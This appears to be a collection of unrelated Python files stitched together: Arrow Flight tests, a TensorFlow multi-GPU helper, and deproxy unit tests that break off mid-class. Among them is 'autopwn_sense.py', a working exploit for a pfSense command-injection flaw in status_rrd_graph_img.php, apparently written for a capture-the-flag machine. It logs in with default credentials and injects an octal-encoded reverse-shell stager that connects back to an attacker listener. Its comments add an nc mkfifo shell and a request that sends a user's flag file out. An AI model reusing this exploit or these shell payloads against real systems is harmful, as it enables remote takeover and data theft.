def test_location_unknown_scheme():
"""Test creating locations for unknown schemes."""
assert flight.Location("s3://foo").uri == b"s3://foo"
assert flight.Location("https://example.com/bar.parquet").uri == \
b"https://example.com/bar.parquet"
@pytest.mark.slow
@pytest.mark.requires_testing_data
def test_tls_fails():
"""Make sure clients cannot connect when cert verification fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
# Ensure client doesn't connect when certificate verification
# fails (this is a slow test since gRPC does retry a few times)
client = FlightClient("grpc+tls://localhost:" + str(s.port))
# gRPC error messages change based on version, so don't look
# for a particular error
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints')).read_all()
@pytest.mark.requires_testing_data
def test_tls_do_get():
"""Try a simple do_get call over TLS."""
table = simple_ints_table()
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = FlightClient(('localhost', s.port),
tls_root_certs=certs["root_cert"])
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
@pytest.mark.requires_testing_data
def test_tls_override_hostname():
"""Check that incorrectly overriding the hostname fails."""
certs = example_tls_certs()
with ConstantFlightServer(tls_certificates=certs["certificates"]) as s:
client = flight.connect(('localhost', s.port),
tls_root_certs=certs["root_cert"],
override_hostname="fakehostname")
with pytest.raises(flight.FlightUnavailableError):
client.do_get(flight.Ticket(b'ints'))
def test_flight_do_get_metadata():
"""Try a simple do_get call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
batches = []
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b''))
idx = 0
while True:
try:
batch, metadata = reader.read_chunk()
batches.append(batch)
server_idx, = struct.unpack('<i', metadata.to_pybytes())
assert idx == server_idx
idx += 1
except StopIteration:
break
data = pa.Table.from_batches(batches)
assert data.equals(table)
def test_flight_do_put_metadata():
"""Try a simple do_put call with metadata."""
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
with writer:
for idx, batch in enumerate(table.to_batches(max_chunksize=1)):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
buf = metadata_reader.read()
assert buf is not None
server_idx, = struct.unpack('<i', buf.to_pybytes())
assert idx == server_idx
@pytest.mark.slow
def test_cancel_do_get():
"""Test canceling a DoGet operation on the client side."""
with ConstantFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
reader.cancel()
with pytest.raises(flight.FlightCancelledError, match=".*Cancel.*"):
reader.read_chunk()
@pytest.mark.slow
def test_cancel_do_get_threaded():
"""Test canceling a DoGet operation from another thread."""
with SlowFlightServer() as server:
client = FlightClient(('localhost', server.port))
reader = client.do_get(flight.Ticket(b'ints'))
read_first_message = threading.Event()
stream_canceled = threading.Event()
result_lock = threading.Lock()
raised_proper_exception = threading.Event()
def block_read():
reader.read_chunk()
read_first_message.set()
stream_canceled.wait(timeout=5)
try:
reader.read_chunk()
except flight.FlightCancelledError:
with result_lock:
raised_proper_exception.set()
thread = threading.Thread(target=block_read, daemon=True)
thread.start()
read_first_message.wait(timeout=5)
reader.cancel()
stream_canceled.set()
thread.join(timeout=1)
with result_lock:
assert raised_proper_exception.is_set()
def test_roundtrip_types():
"""Make sure serializable types round-trip."""
ticket = flight.Ticket("foo")
assert ticket == flight.Ticket.deserialize(ticket.serialize())
desc = flight.FlightDescriptor.for_command("test")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
desc = flight.FlightDescriptor.for_path("a", "b", "test.arrow")
assert desc == flight.FlightDescriptor.deserialize(desc.serialize())
info = flight.FlightInfo(
pa.schema([('a', pa.int32())]),
desc,
[
flight.FlightEndpoint(b'', ['grpc://test']),
flight.FlightEndpoint(
b'',
[flight.Location.for_grpc_tcp('localhost', 5005)],
),
],
-1,
-1,
)
info2 = flight.FlightInfo.deserialize(info.serialize())
assert info.schema == info2.schema
assert info.descriptor == info2.descriptor
assert info.total_bytes == info2.total_bytes
assert info.total_records == info2.total_records
assert info.endpoints == info2.endpoints
def test_roundtrip_errors():
"""Ensure that Flight errors propagate from server to client."""
with ErrorFlightServer() as server:
client = FlightClient(('localhost', server.port))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.do_action(flight.Action("internal", b"")))
with pytest.raises(flight.FlightTimedOutError, match=".*foo.*"):
list(client.do_action(flight.Action("timedout", b"")))
with pytest.raises(flight.FlightCancelledError, match=".*foo.*"):
list(client.do_action(flight.Action("cancel", b"")))
with pytest.raises(flight.FlightUnauthenticatedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthenticated", b"")))
with pytest.raises(flight.FlightUnauthorizedError, match=".*foo.*"):
list(client.do_action(flight.Action("unauthorized", b"")))
with pytest.raises(flight.FlightInternalError, match=".*foo.*"):
list(client.list_flights())
def test_do_put_independent_read_write():
"""Ensure that separate threads can read/write on a DoPut."""
# ARROW-6063: previously this would cause gRPC to abort when the
# writer was closed (due to simultaneous reads), or would hang
# forever.
data = [
pa.array([-10, -5, 0, 5, 10])
]
table = pa.Table.from_arrays(data, names=['a'])
with MetadataFlightServer() as server:
client = FlightClient(('localhost', server.port))
writer, metadata_reader = client.do_put(
flight.FlightDescriptor.for_path(''),
table.schema)
count = [0]
def _reader_thread():
while metadata_reader.read() is not None:
count[0] += 1
thread = threading.Thread(target=_reader_thread)
thread.start()
batches = table.to_batches(max_chunksize=1)
with writer:
for idx, batch in enumerate(batches):
metadata = struct.pack('<i', idx)
writer.write_with_metadata(batch, metadata)
# Causes the server to stop writing and end the call
writer.done_writing()
# Thus reader thread will break out of loop
thread.join()
# writer.close() won't segfault since reader thread has
# stopped
assert count[0] == len(batches)
def test_server_middleware_same_thread():
"""Ensure that server middleware run on the same thread as the RPC."""
with HeaderFlightServer(middleware={
"test": HeaderServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
results = list(client.do_action(flight.Action(b"test", b"")))
assert len(results) == 1
value = results[0].body.to_pybytes()
assert b"right value" == value
def test_middleware_reject():
"""Test rejecting an RPC with server middleware."""
with HeaderFlightServer(middleware={
"test": SelectiveAuthServerMiddlewareFactory(),
}) as server:
client = FlightClient(('localhost', server.port))
# The middleware allows this through without auth.
with pytest.raises(pa.ArrowNotImplementedError):
list(client.list_actions())
# But not anything else.
with pytest.raises(flight.FlightUnauthenticatedError):
list(client.do_action(flight.Action(b"", b"")))
client = FlightClient(
('localhost', server.port),
middleware=[SelectiveAuthClientMiddlewareFactory()]
)
response = next(client.do_action(flight.Action(b"", b"")))
assert b"password" == response.body.to_pybytes()
|
multi_gpu.py
|
import multiprocessing as mp
import traceback
from contextlib import contextmanager
import six
import tensorflow as tf
from tfsnippet.utils import (is_tensor_object,
is_tensorflow_version_higher_or_equal)
from .misc import cached
__all__ = ['detect_gpus', 'average_gradients', 'MultiGPU']
@cached
def detect_gpus():
"""
Detect the GPU devices and their interconnection on current machine.
Returns:
list[list[str]]: List of GPU groups, each group is a list of
GPU device names. The GPUs in one group are interconnected.
"""
def worker(q):
# `device_lib` will not release the memory it took,
# so we run it in a sub-process.
try:
from tensorflow.python.client import device_lib
if is_tensorflow_version_higher_or_equal('1.8.0'):
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
devices = list(device_lib.list_local_devices(config))
else:
devices = list(device_lib.list_local_devices())
gpus = [
(device.name, device)
for device in devices
if device.device_type == 'GPU'
]
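            # Union-find over GPU indices: GPUs joined by a locality link collapse
            # into the same interconnection group.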
union_set = {i: i for i in range(len(gpus))}
for i, (name, device) in enumerate(gpus):
assert (device.name == '/device:GPU:{}'.format(i))
for link in device.locality.links.link:
if link.device_id != i:
union_set[i] = union_set[link.device_id]
for i in six.iterkeys(union_set):
while union_set[i] != union_set[union_set[i]]:
union_set[i] = union_set[union_set[i]]
root_devices = sorted(set(union_set.values()))
gpu_groups = [[] for _ in range(len(root_devices))]
dev_to_group = {j: i for i, j in enumerate(root_devices)}
for i, (name, device) in enumerate(gpus):
gpu_groups[dev_to_group[union_set[i]]].append(name)
q.put((1, gpu_groups))
except Exception:
q.put((0, traceback.format_exc()))
q = mp.Queue()
p = mp.Process(target=worker, args=(q,))
try:
p.start()
result = q.get()
if result[0] == 1:
return result[1]
else:
raise RuntimeError(
'Failed to retrieve GPU information, the traceback of '
'sub-process is:\n {}'.
format('\n '.join(result[1].split('\n')))
)
finally:
p.terminate()
p.join()
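# Illustrative example (the grouping is machine dependent): on a host with three GPUs
# where GPU:0 and GPU:1 are interconnected, `detect_gpus()` would return something
# like [['/device:GPU:0', '/device:GPU:1'], ['/device:GPU:2']].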
def average_gradients(tower_grads):
"""
Calculate the average gradient for each shared variable across all towers.
Note that this function provides a synchronization point across all towers.
Source:
https://github.com/tensorflow/models/blob/master/tutorials/image/
cifar10/cifar10_multi_gpu_train.py
Args:
tower_grads: List of lists of (gradient, variable) tuples. The outer
list is over individual gradients. The inner list is over the
gradient calculation for each tower.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all towers.
"""
if len(tower_grads) == 1:
return tower_grads[0]
average_grads = []
for grad_and_vars in zip(*tower_grads):
# Note that each grad_and_vars looks like the following:
# ((grad0_gpu0, var0_gpu0), ... , (grad0_gpuN, var0_gpuN))
grads = []
for g, _ in grad_and_vars:
# Add 0 dimension to the gradients to represent the tower.
expanded_g = tf.expand_dims(g, 0)
# Append on a 'tower' dimension which we will average over below.
grads.append(expanded_g)
# Average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# Keep in mind that the Variables are redundant because they are shared
# across towers. So .. we will just return the first tower's pointer to
# the Variable.
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
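# A hedged usage sketch for `average_gradients` (two towers sharing one variable;
# the constants stand in for per-tower gradients and are purely illustrative):
def _average_gradients_usage_sketch():
    shared_var = tf.Variable(0.0, name='shared_var')
    tower_grads = [
        [(tf.constant(1.0), shared_var)],  # gradients computed on tower 0
        [(tf.constant(3.0), shared_var)],  # gradients computed on tower 1
    ]
    # Returns [(averaged_grad, shared_var)]; averaged_grad evaluates to 2.0.
    return average_gradients(tower_grads)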
class MultiGPU(object):
"""
Class to help build data-paralleled outputs and training operations.
"""
def __init__(self, disable_prebuild=False):
"""
Construct a :class:`MultiGPU`.
Args:
            disable_prebuild: Whether or not to disable pre-building on CPU.
Some operations (e.g., NCHW convolutional kernels) may not be
supported by CPUs for the time being, thus the pre-building on
CPUs might need to be disabled.
"""
gpu_groups = detect_gpus()
if not gpu_groups:
self._main_device = '/device:CPU:0'
elif len(gpu_groups) != 1 and not disable_prebuild:
self._main_device = '/device:CPU:0'
else:
self._main_device = gpu_groups[0][0]
self._disable_prebuild = disable_prebuild
self._gpu_devices = tuple(sum(gpu_groups, []))
self._work_devices = self._gpu_devices \
if self._gpu_devices else [self._main_device]
@property
def disable_prebuild(self):
"""Whether or not to disable pre-build on CPU?"""
return self._disable_prebuild
@property
def main_device(self):
"""
Get the main device name.
Main device is the device for storing variables, and for gathering
        losses / gradients during training. It is not necessarily one
        of the `work_devices`. Do not run the model computation graph on the
`main_device`, otherwise the `channels_last` parameter for convolutional
layers might result in undesired behaviors.
"""
return self._main_device
@property
def work_devices(self):
"""
Get the names of the working devices.
The model computation graph should be run only on these devices.
        Do not run it on the `main_device`, otherwise the `channels_last`
parameter for convolutional layers might result in undesired behaviors.
"""
return self._work_devices
@property
def gpu_devices(self):
"""Get the names of GPU devices."""
return self._gpu_devices
def is_gpu_device(self, device):
"""Check whether or not `device` is a GPU device."""
return device in self._gpu_devices
def channels_last(self, device):
"""
Get the `channels_last` argument for `device`.
It will be :obj:`True` for non-GPU devices, :obj:`False` for GPUs.
Be careful if you want to build a model on both CPU and GPU devices,
with ``channels_last = multi_gpu.channels_last(device)``.
The convolutional layers will work as desired, but the dense layers
after or before a convolutional layer will not work properly, unless
special treatment is taken.
"""
return device not in self._gpu_devices
def data_parallel(self, batch_size, inputs):
"""
Iterate through all devices and build the data-paralleled model.
Args:
batch_size (int or tf.Tensor): The size of each mini-batch.
inputs (Iterable[tf.Tensor]): Input placeholders to be sliced
for data parallelism. The input placeholders will be sliced
through the first dimension.
Yields:
str, bool, tuple[tf.Tensor]: ``(dev, pre_build, inputs)``,
the device name, a flag indicating whether this is a
pre-building pass for creating variables on CPU, and the
tuple of sliced input placeholders.
"""
inputs = list(inputs)
# quick path: only one device, do not slice
if len(self.work_devices) == 1:
assert(self.main_device == self.work_devices[0])
yield self.main_device, False, tuple(inputs)
# slow path: multi-GPUs
else:
# the GPUs are not in the same group, place variables on CPU
if self.main_device not in self.work_devices:
yield self.main_device, True, tuple(inputs)
# build the paralleled computation graph for each device
with tf.name_scope('data_parallel') as ns:
pass # generate a name scope to place our data slicing ops
k = len(self.work_devices)
for i, device in enumerate(self.work_devices):
dev_inputs = []
with tf.name_scope(ns + 'tower_gpu_{}'.format(i)):
for inp in inputs:
slice_len = (batch_size + k - 1) // k
low, high = slice_len * i, slice_len * (i + 1)
dev_inputs.append(inp[low: high])
yield device, False, tuple(dev_inputs)
@contextmanager
def maybe_name_scope(self, device):
"""
Generate a name scope if `device` is not `main_device`.
Args:
device (str): The name of the device.
        Yields:
The generated name scope, or None.
"""
if device == self.main_device:
yield
elif device not in self._gpu_devices:
with tf.name_scope('tower_cpu') as ns:
yield ns
else:
gpu_id = self._gpu_devices.index(device)
with tf.name_scope('tower_gpu_{}'.format(gpu_id)) as ns:
yield ns
def average_grads(self, grads):
"""
Take the averaged gradients on the main device.
Args:
grads: List of lists of (gradients, variables) pairs.
Returns:
List of pairs of (gradient, variable) where the gradient has been
averaged across all devices.
"""
# quick path: only one device, just return the grads
if len(grads) == 1:
return grads[0]
# slow path: multi-GPUs
else:
with tf.device(self.main_device), tf.name_scope('average_grads'):
return average_gradients(grads)
def apply_grads(self, grads, optimizer, global_step=None,
control_inputs=None):
"""
Apply the gradients.
Args:
grads: List of (gradients, variables) pairs.
optimizer: The TensorFlow optimizer.
global_step: The optional global step counter.
control_inputs: Dependency operations before applying the gradients.
Returns:
The operation of applying gradients.
"""
def mk_op():
return optimizer.apply_gradients(grads, global_step=global_step)
with tf.device(self.main_device), tf.name_scope('apply_grads'):
if control_inputs:
with tf.control_dependencies(control_inputs):
return mk_op()
else:
return mk_op()
def average(self, tensors, batch_size=None):
"""
Take the average of given tensors from different devices.
If `batch_size` is specified, the tensors will be averaged with respect
to the size of data fed to each device.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
batch_size (None or int or tf.Tensor): The optional batch size.
Returns:
list[tf.Tensor]: The averaged tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: average all tensors
with tf.device(self.main_device), tf.name_scope('average_tensors'):
if batch_size is None:
return [tf.reduce_mean(tf.stack(t), axis=0) for t in tensors]
k = len(self.work_devices)
slice_len = (batch_size + k - 1) // k
last_slice_size = batch_size - (k - 1) * slice_len
if is_tensor_object(batch_size):
to_float = tf.to_float
else:
to_float = float
float_batch_size = to_float(batch_size)
weights = tf.stack(
[to_float(slice_len) / float_batch_size] * (k - 1) +
[to_float(last_slice_size) / float_batch_size]
)
return [tf.reduce_sum(tf.stack(t) * weights, axis=0)
for t in tensors]
def concat(self, tensors):
"""
Concat given tensors from different devices.
Args:
tensors (list[list[tf.Tensor]]): List of tensors from each device.
Returns:
list[tf.Tensor]: The concatenated tensors.
"""
# check the arguments and try the fast path: only one tensor
tensors = list(tensors)
if not tensors:
return []
length = len(tensors[0])
if length == 0:
raise ValueError('`tensors` must be list of non-empty Tensor '
'lists.')
for t in tensors[1:]:
if len(t) != length:
raise ValueError('`tensors` must be list of Tensor lists of '
'the same length.')
if length == 1:
return [t[0] for t in tensors]
# do the slow path: concat all tensors
        with tf.device(self.main_device), tf.name_scope('concat_tensors'):
return [tf.concat(t, axis=0) for t in tensors]
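# A hedged end-to-end sketch of how the pieces above are meant to compose into a
# data-paralleled training op. `build_loss` is a placeholder for user code that maps
# the sliced input tensors to a scalar loss; it is not part of this module.
def _multi_gpu_training_sketch(build_loss, optimizer, batch_size, inputs):
    multi_gpu = MultiGPU()
    grads, losses = [], []
    for dev, pre_build, dev_inputs in multi_gpu.data_parallel(batch_size, inputs):
        with tf.device(dev), multi_gpu.maybe_name_scope(dev):
            loss = build_loss(*dev_inputs)
            if pre_build:
                continue  # the CPU pre-building pass only creates the variables
            losses.append([loss])
            grads.append(optimizer.compute_gradients(loss))
    train_op = multi_gpu.apply_grads(
        grads=multi_gpu.average_grads(grads),
        optimizer=optimizer,
    )
    # Average the per-device losses, weighted by the size of each device's slice.
    [mean_loss] = multi_gpu.average(losses, batch_size)
    return train_op, mean_loss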
|
autopwn_sense.py
|
#!/usr/bin/env python2
# Author: Alamot (Antonios Tsolis)
import re
import sys
import time
from pwn import *
import signal, threading
import requests, urllib3
signal.signal(signal.SIGINT, signal.SIG_DFL)
DEBUG = False
RHOST="10.10.10.60"
RPORT=443
LHOST="10.10.14.5"
LPORT=60001
if DEBUG:
context.log_level = 'debug'
else:
context.log_level = 'info'
def send_ptyshell_payload():
#stager = "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc " + str(LHOST) + " " + str(LPORT) + " > /tmp/f"
stager = "python -c \"import os, pty, socket; lhost = '"+ str(LHOST) + "'; lport = " + str(LPORT) + "; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv('HISTFILE','/dev/null'); pty.spawn('/bin/sh'); s.close(); exit()\""
encoded_stager = ""
for c in stager:
encoded_stager += "\\\\%03d" %(int(oct(ord(c))))
time.sleep(1)
client = None
try:
urllib3.disable_warnings()
client = requests.session()
client.verify = False
client.keep_alive = False
# Retrieve the CSRF token first
p1=log.progress("Connecting to get csrf token")
response = client.get("https://"+str(RHOST)+":"+str(RPORT), timeout=20)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
csrf = re.search('csrfMagicToken\s*=\s*"(sid:\w+,\d+)', response.text).group(1)
p1.success("csrfMagicToken = " + csrf)
# Login
p2=log.progress("Logging in")
data={"__csrf_magic":csrf, "usernamefld":"rohit", "passwordfld":"pfsense", "login":"Login"}
response = client.post("https://"+str(RHOST)+":"+str(RPORT)+"/index.php", data=data, timeout=20)
if response.status_code != 200:
p1.failure("Status "+str(response.status_code))
sys.exit()
p2.success("Status "+str(response.status_code))
# Send payload
p3=log.progress("Sending pty shell payload...")
try:
params={"database":"-throughput.rrd", "graph":"file|printf "+encoded_stager+"|sh|echo "}
response = client.get("https://"+str(RHOST)+":"+str(RPORT)+"/status_rrd_graph_img.php", params=params, timeout=20)
if response.status_code != 200:
p3.failure("Status "+str(response.status_code))
sys.exit()
except requests.exceptions.Timeout as e:
p3.success("OK")
except requests.exceptions.RequestException as e:
log.failure(str(e))
finally:
if client:
client.close()
log.success("Web thread exited successfully.")
try:
threading.Thread(target=send_ptyshell_payload).start()
except Exception as e:
log.error(str(e))
ptyshell = listen(LPORT, timeout=20).wait_for_connection()
if ptyshell.sock is None:
log.failure("Connection timeout.")
sys.exit()
ptyshell.interactive()
sys.exit()
'''
https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|command|echo%20
https://10.0.0.145/status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20OCTET_ENCODED_SHELLCODE|sh|echo%20
GET /status_rrd_graph_img.php?database=-throughput.rrd&graph=file|printf%20\\156\\143\\040\\061\\060\\056\\061\\060\\056\\061\\064\\056\\061\\066\\060\\040\\066\\060\\060\\060\\060\\040\\074\\040\\057\\150\\157\\155\\145\\057\\162\\157\\150\\151\\164\\057\\165\\163\\145\\162\\056\\164\\170\\164
|sh|echo%20 HTTP/1.1
Host: 10.0.0.145
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Cookie: PHPSESSID=28530634f9c99cd400bd73b28b812482
Connection: close
'''
|
test_deproxy.py
|
#!/usr/bin/python
import deproxy
import unittest
import threading
import logging
import socket
import argparse
import time
from unittest import skip
deproxy_port_base = 9999
deproxy_port_iter = None
def get_next_deproxy_port():
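    # Hand out ports counting down from deproxy_port_base so that each test
    # gets a port that has not yet been bound during this run.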
global deproxy_port_iter
if deproxy_port_iter is None:
def deproxy_port_iter_func():
for i in xrange(deproxy_port_base):
yield deproxy_port_base - i
deproxy_port_iter = deproxy_port_iter_func().next
return deproxy_port_iter()
class TestDefaultHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_default_handler(self):
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port)
self.assertEquals(int(mc.received_response.code), 200)
class TestEchoHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_echo_handler(self):
methods = ["GET", "PUT", "POST", "DELETE", "HEAD", "OPTIONS", "PATCH"]
headers = {'x-header': '12345'}
for method in methods:
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port, headers=headers,
request_body='this is the body',
default_handler=deproxy.echo_handler,
method=method)
self.assertEquals(int(mc.received_response.code), 200)
self.assertIn('x-header', mc.received_response.headers)
self.assertEquals(mc.received_response.headers['x-header'], '12345')
expected_body = "" if method == "HEAD" else 'this is the body'
self.assertEquals(mc.received_response.body, expected_body)
class TestDelayHandler(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_delay_handler(self):
handler = deproxy.delay(3, deproxy.simple_handler)
t1 = time.time()
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=handler)
t2 = time.time()
self.assertEquals(int(mc.received_response.code), 200)
self.assertGreaterEqual(t2 - t1, 3)
self.assertLessEqual(t2 - t1, 3.5)
class TestRoute(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_route(self):
handler = deproxy.route('http', 'httpbin.org', self.deproxy)
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=handler)
self.assertEquals(int(mc.received_response.code), 200)
class TestCustomHandlers(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_custom_handler_function(self):
def custom_handler(request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=custom_handler)
self.assertEquals(int(mc.received_response.code), 606)
def handler_method(self, request):
return deproxy.Response(code=606, message="Spoiler",
headers={"Header-Name": "Header-Value"},
body='Snape Kills Dumbledore')
def test_custom_handler_method(self):
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=self.handler_method)
self.assertEquals(int(mc.received_response.code), 606)
class TestEndpointDefaultHandler(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_endpoint_default_handler_function(self):
def custom_handler(request):
return deproxy.Response(code='601', message='Custom', headers={},
body=None)
self.deproxy.add_endpoint(port=self.port,
default_handler=custom_handler)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '601')
self.assertEqual(mc.received_response.code, '601')
def custom_handler_method(self, request):
return deproxy.Response(code='602', message='Custom', headers={},
body=None)
def test_endpoint_default_handler_method(self):
self.deproxy.add_endpoint(port=self.port,
default_handler=self.custom_handler_method)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '602')
self.assertEqual(mc.received_response.code, '602')
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
class TestDeproxyDefaultHandler(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
def test_deproxy_default_handler_function(self):
def custom_handler(request):
return deproxy.Response(code='603', message='Custom', headers={},
body=None)
self.deproxy = deproxy.Deproxy(default_handler=custom_handler)
self.deproxy.add_endpoint(port=self.port)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '603')
self.assertEqual(mc.received_response.code, '603')
def custom_handler_method(self, request):
return deproxy.Response(code='604', message='Custom', headers={},
body=None)
def test_deproxy_default_handler_method(self):
self.deproxy = deproxy.Deproxy(
default_handler=self.custom_handler_method)
self.deproxy.add_endpoint(port=self.port)
url = 'http://localhost:{0}/'.format(self.port)
mc = self.deproxy.make_request(url=url)
self.assertEqual(len(mc.handlings), 1)
self.assertEqual(mc.handlings[0].response.code, '604')
self.assertEqual(mc.received_response.code, '604')
def tearDown(self):
if hasattr(self, 'deproxy') and self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
class TestOrphanedHandlings(unittest.TestCase):
def setUp(self):
self.deproxy_port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.end_point = self.deproxy.add_endpoint(self.deproxy_port)
self.other_client = deproxy.Deproxy()
def tearDown(self):
self.deproxy.shutdown_all_endpoints()
def test_orphaned_handling(self):
delayed_handler = deproxy.delay(4, deproxy.simple_handler)
self.long_running_mc = None
class Helper:
mc = None
helper = Helper()
def other_thread():
mc = self.deproxy.make_request('http://localhost:%i/' %
self.deproxy_port,
default_handler=delayed_handler)
helper.mc = mc
t = threading.Thread(target=other_thread)
t.daemon = True
t.start()
self.other_client.make_request('http://localhost:%i/' %
self.deproxy_port)
t.join()
self.assertEqual(len(helper.mc.orphaned_handlings), 1)
class TestEndpointShutdown(unittest.TestCase):
def setUp(self):
self.deproxy_port1 = get_next_deproxy_port()
self.deproxy_port2 = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_shutdown(self):
e1 = self.deproxy.add_endpoint(self.deproxy_port1)
e2 = self.deproxy.add_endpoint(self.deproxy_port2)
e1.shutdown()
try:
e3 = self.deproxy.add_endpoint(self.deproxy_port1)
except socket.error as e:
self.fail('Address already in use: %s' % e)
class TestShutdownAllEndpoints(unittest.TestCase):
def setUp(self):
self.deproxy_port1 = get_next_deproxy_port()
self.deproxy_port2 = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
def test_shutdown(self):
e1 = self.deproxy.add_endpoint(self.deproxy_port1)
e2 = self.deproxy.add_endpoint(self.deproxy_port2)
self.deproxy.shutdown_all_endpoints()
try:
e3 = self.deproxy.add_endpoint(self.deproxy_port1)
except socket.error as e:
            self.fail('add_endpoint threw an exception: %s' % e)
try:
e4 = self.deproxy.add_endpoint(self.deproxy_port2)
except socket.error as e:
            self.fail('add_endpoint threw an exception: %s' % e)
class TestAutomaticRequestHeaders(unittest.TestCase):
def setUp(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.endpoint = self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{}/'.format(self.port)
def tearDown(self):
if self.deproxy is not None:
self.deproxy.shutdown_all_endpoints()
def test_not_specified(self):
mc = self.deproxy.make_request(url=self.url)
self.assertIn('Host', mc.sent_request.headers)
#self.assertIn('host', mc.sent_request.headers)
self.assertIn('Accept', mc.sent_request.headers)
self.assertIn('Accept-Encoding', mc.sent_request.headers)
self.assertIn('User-Agent', mc.sent_request.headers)
def test_explicit_on(self):
mc = self.deproxy.make_request(url=self.url, add_default_headers=True)
self.assertIn('Host', mc.sent_request.headers)
#self.assertIn('host', mc.sent_request.headers)
self.assertIn('Accept', mc.sent_request.headers)
self.assertIn('Accept-Encoding', mc.sent_request.headers)
self.assertIn('User-Agent', mc.sent_request.headers)
def test_explicit_off(self):
mc = self.deproxy.make_request(url=self.url, add_default_headers=False)
self.assertNotIn('Host', mc.sent_request.headers)
#self.assertNotIn('host', mc.sent_request.headers)
self.assertNotIn('Accept', mc.sent_request.headers)
self.assertNotIn('Accept-Encoding', mc.sent_request.headers)
self.assertNotIn('User-Agent', mc.sent_request.headers)
class TestDefaultResponseHeaders(unittest.TestCase):
@classmethod
def setUpClass(self):
self.port = get_next_deproxy_port()
self.deproxy = deproxy.Deproxy()
self.endpoint = self.deproxy.add_endpoint(self.port)
self.url = 'http://localhost:{}/'.format(self.port)
@classmethod
def tearDownClass(self):
